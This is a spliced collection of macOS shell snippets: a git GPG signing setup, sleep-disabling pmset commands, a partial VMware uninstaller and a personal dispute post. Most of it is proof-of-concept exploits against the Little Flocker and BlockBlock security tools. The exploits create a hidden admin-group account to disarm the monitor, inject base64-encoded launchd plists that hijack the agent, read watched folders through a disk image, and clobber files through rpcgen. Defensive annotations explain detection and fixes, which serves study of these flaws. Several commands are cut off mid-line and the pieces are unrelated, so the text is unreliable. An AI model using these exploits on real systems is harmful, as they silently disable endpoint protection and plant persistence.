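# Install GPG Tools 2 and generate your PGP keys
# Add the public key in your Github account
# Get your long id by doing: gpg --list-keys --keyid-format long
# Execute this with your long key id as the only argument: bash git.sh <LONG KEY ID>
# Ty https://github.com/Microsoft/vscode/issues/5065#issuecomment-207960831
#
# The key id is taken from $1 instead of an inline placeholder, so a forgotten
# edit cannot end up storing the literal text "[LONG KEY ID]" in ~/.gitconfig.
key_id="${1:?usage: bash git.sh LONG-KEY-ID (see: gpg --list-keys --keyid-format long)}"

# All three settings belong together; stop on the first failure instead of
# leaving commit.gpgsign on without a usable signing key.
git config --global user.signingkey "$key_id" \
  && git config --global commit.gpgsign true \
  && git config --global gpg.program gpg2 \
  || exit 1

# 'no-tty' lets gpg2 run from editors/IDEs that have no terminal attached.
# Append it only once so re-running this script does not pile up duplicates;
# the grep's stderr is silenced on purpose because gpg.conf may not exist yet.
mkdir -p "$HOME/.gnupg"
grep -qx 'no-tty' "$HOME/.gnupg/gpg.conf" 2>/dev/null \
  || echo 'no-tty' >> "$HOME/.gnupg/gpg.conf"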
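# Useful to prevent Macbooks to go to sleep when closing the lid instead of running tools that requires a Kernel Extension (e.g. InsomniaX) and more
#
# -a applies the setting to every power source (battery, charger, UPS).
# The three commands are chained with && so a cancelled or failed sudo stops
# the sequence instead of leaving a half-applied power profile.
# Caveat: with disablesleep the machine stays awake, unlocked-in-memory and on
# the network while the lid is closed; keep a short screen-lock timeout and
# restore the defaults when no longer needed (e.g. sudo pmset -a disablesleep 0).
sudo pmset -a sleep 0 \
  && sudo pmset -a hibernatemode 0 \
  && sudo pmset -a disablesleep 1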
watch prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "any" wcxm
allow prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" r
#!/usr/bin/env bash
# Usage: bash uninstall_vmware.bash
remove() {
entry="$1"
echo -ne "Removing $entry ["
sudo rm -rf "$entry"
if [[ ! -e "$entry" ]]; then
echo -ne "OK"
# Little Flocker PoC lines as published in the report; annotated below from the
# defender's side (what each line demonstrates and what the agent should have
# checked). Code is kept exactly as posted.
# - An attacker can prevent the agent from showing the app icon (via /dev/null)
#   The agent's temporary icon path is pre-created as a character device
#   (the report's "/dev/null" trick) instead of a regular file, so the agent
#   can never place a real image there.
#   Lesson: never trust a fixed path in a world-writable directory; create it
#   atomically (mkstemp-style), verify it is a regular file you own, and fail
#   closed if the prompt cannot be rendered.
mknod /tmp/LittleFlockerTemp.png c 1 3
# - A file with a long name can hide buttons when the popup appear
#   A 254-character name made of carriage returns plus control bytes (bash
#   command substitution drops the NUL from "\x00", so only the \x02 survives)
#   is created and then opened, presumably to trigger the prompt with that name.
#   Lesson: escape or truncate non-printable characters in any attacker-
#   controlled string before rendering it in a security dialog.
touch $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
nano $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
# - Little Flocker does not watch every startup folders/files therefore an
# attacker can create startup items at these places (thanks Patrick Wardle):
Hello,
Here is the last discussion I had with him (he dared to mention me on a 10-day-old topic, and then when I gave arguments on the very same topic or replied to his attacks I "harass" him): https://github.com/drduh/OS-X-Security-and-Privacy-Guide/pull/128
So I’m going to do this really fast to prevent another blog post from happening again and to avoid wasting even more time.
Jonathan recycled an old pastebin he made to do some propaganda against me (https://twitter.com/pwnsdx/status/770353299140771840) so I'm going to clarify this here, point by point:
Diff between both pastebins: https://i.imgur.com/TRqgn5g.png
# Disarm Little Flocker silently (privileged)
# Root-level PoC from the report, kept exactly as posted. What it does:
# creates a hidden local account with dscl (IsHidden 1, fixed UniqueID 1202,
# PrimaryGroupID 80 = the macOS admin group), writes an "allow prefix / any
# rwcm" rule into /var/empty/.littleflockerrc, waits 61 s (presumably for the
# agent to load the rule), then deletes the account and the rule file.
# Detection pointers: dscl -create of an account with IsHidden=1 and
# PrimaryGroupID=80; any write to /var/empty/.littleflockerrc, or to a
# .littleflockerrc outside a real user's home; accounts created and deleted
# within minutes.
# Mitigation: per-user rule files must only be honoured for real, non-hidden
# users whose home is a directory the user actually owns; /var/empty is never
# a valid home.
FAKEUSER=pwned$(grep -m1 -ao '[0-9][0-9]' /dev/urandom | sed s/10/99/ | head -n1); echo "Creating fake user account..." && dscl . -create /Users/$FAKEUSER IsHidden 1 && dscl . -create /Users/$FAKEUSER UserShell /bin/bash && dscl . -create /Users/$FAKEUSER RealName "${FAKEUSER}" && dscl . -create /Users/$FAKEUSER UniqueID "1202" && dscl . -create /Users/$FAKEUSER PrimaryGroupID 80 && echo "Injecting payload..." && echo 'allow prefix "/" "any" rwcm' > /var/empty/.littleflockerrc && sync && echo "Please wait (up to 1 minute)..." && sleep 61 && dscl . -delete /Users/$FAKEUSER && rm -rf /var/empty/.littleflockerrc && echo "Little Flocker is now disarmed" && cd /Users
# UPDATE (0.0.77)
# Still works, broken fix:
# https://github.com/jzdziarski/littleflocker/commit/bcce9cf279eb27b04cf644ecc49fee767f1e0579
# 1. via /Users/Shared
echo "Creating fake user account..." && dscl . -create /Users/Shared IsHidden 1 && dscl . -create /Users/Shared UserShell /bin/bash && dscl . -
# Inject malicious datas into BlockBlock plist (will create "pwned-unprivileged" file in /tmp) (unprivileged)
# PoC kept exactly as posted. The base64 blob decodes to a binary launchd
# plist that keeps BlockBlock's own label (com.objectiveSee.blockblock.agent)
# but sets ProgramArguments to `bash -c "touch /tmp/pwned-unprivileged;
# /Applications/BlockBlock.app/Contents/MacOS/BlockBlock agent"`, i.e. it
# wraps the real agent with an attacker command. The user-writable
# LaunchAgents plist is truncated, then rewritten with the decoded blob.
# Lesson for the tool: verify ownership/permissions and a hash or signature
# of its own launchd files at start, and refuse to run from a plist it did not
# install. Detection: writes to ~/Library/LaunchAgents/com.objectiveSee.* by
# anything other than the installer.
(> ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBbdG91Y2ggL3RtcC9wd25lZC11bnByaXZpbGVnZWQ7IC9BcHBsaWNhdGlvbnMvQmxvY2tCbG9jay5hcHAvQ29udGVudHMvTWFjT1MvQmxvY2tCbG9jayBhZ2VudAlfECFjb20ub2JqZWN0aXZlU2VlLmJsb2NrYmxvY2suYWdlbnQIESc6REpLT1RXtbYAAAAAAAABAQAAAAAAAAAMAAAAAAAAAAAAAAAAAAAA2g==" | base64 --decode) > ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist)
# Inject malicious datas into BlockBlock plist (will create "pwned-privileged" file in /tmp) (privileged)
(> /Library/LaunchDaemons/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBadG91Y2ggL3RtcC9wd25lZC1wcml2aWxlZ2VkOyAvQXBwbGljYXRpb25zL0Jsb2NrQmxvY2suYXBwL0NvbnRlbnRzL01hY09TL0Jsb2NrQmxvY2sgZGFlbW
# Read files (privileged)
# PoC kept exactly as posted. Instead of reading $DIRTOSEE directly (the path
# the agent watches), root packages the directory into a read-only HFS+ DMG
# with hdiutil (size = `du -mc` total + 1 MB, volume name and image name
# derived from a sha1 of size+path+time), attaches it at a dot-prefixed mount
# point under /private/tmp and cd's into it; the copy is presumably readable
# without any prompt because the watched path is never opened by the user.
# Lesson: access monitors keyed on the original path miss reads performed by
# privileged helpers. Detection: `hdiutil create ... -srcfolder` over
# sensitive directories, and hidden mount points under /private/tmp.
DIRTOSEE="$HOME/Desktop/test"; DIRSIZE=$(du -mc "$DIRTOSEE" | grep "total" | cut -d$'\t' -f1 | xargs); DIRNAMEHASH=$(echo "$DIRSIZE$DIRTOSEE$(date +%s)" | /usr/bin/openssl sha1); sudo /usr/bin/hdiutil create -ov -size $(($DIRSIZE+1))m -nospotlight -noanyowners -skipunreadable -srcowners off -format UDRO -fs HFS+ -volname .$DIRNAMEHASH -srcfolder "$DIRTOSEE" /tmp/.$DIRNAMEHASH.dmg && hdiutil attach -readonly -noverify -noautofsck -noautoopen -mountpoint /private/tmp/.$DIRNAMEHASH /private/tmp/.$DIRNAMEHASH.dmg && cd /private/tmp/.$DIRNAMEHASH
# Delete a file (unprivileged)
# PoC kept exactly as posted. The target path is handed to an Apple-shipped
# tool (rpcgen) via --output, so the write/truncation that clobbers the file is
# performed by a trusted system binary rather than by the attacker's own
# process. ($FILETODELETE is expanded unquoted here; left as published.)
# Lesson: allow-listing by originating binary is weak whenever any trusted tool
# accepts an arbitrary output path; attribute writes to the controlling
# process/session, and alert on system utilities writing into user directories.
FILETODELETE="$HOME/Desktop/test/com.evilcorp.plist"; /System/Library/PrivateFrameworks/oncrpc.framework/bin/rpcgen --xdr --output $FILETODELETE